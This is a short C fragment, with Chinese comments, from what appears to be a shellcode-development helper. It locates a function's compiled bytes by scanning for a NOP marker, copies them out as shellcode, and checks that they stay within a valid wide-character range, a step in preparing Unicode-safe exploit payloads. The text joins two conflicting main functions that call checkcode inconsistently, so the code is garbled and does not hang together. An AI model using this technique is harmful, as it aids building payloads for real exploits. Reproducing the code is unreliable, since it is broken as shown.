void main() { char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char temp; unsigned char *shellcodefnadd; unsigned char shellcode[512]; int len,k; /* 定位 shellcodefnlock的汇编代码 */ shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k) if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; /* shellcodefnadd+k+8是得到的shellcodefnlock汇编代码地址 */ len = 2*wcslen(shellcodefnadd+k+8); memcpy(shellcode,shellcodefnadd+k+8,len); if(!MakeWideCharList()) return; //SaveToFile(); /*检测shellcode是否在合法的wide char范围*/ checkcode(shellcode, len); //printsc(shellcode, len); }
main(int argc, char *argv[]) { printf("%s: %d\n", argv[1], checkcode(argv[1])); }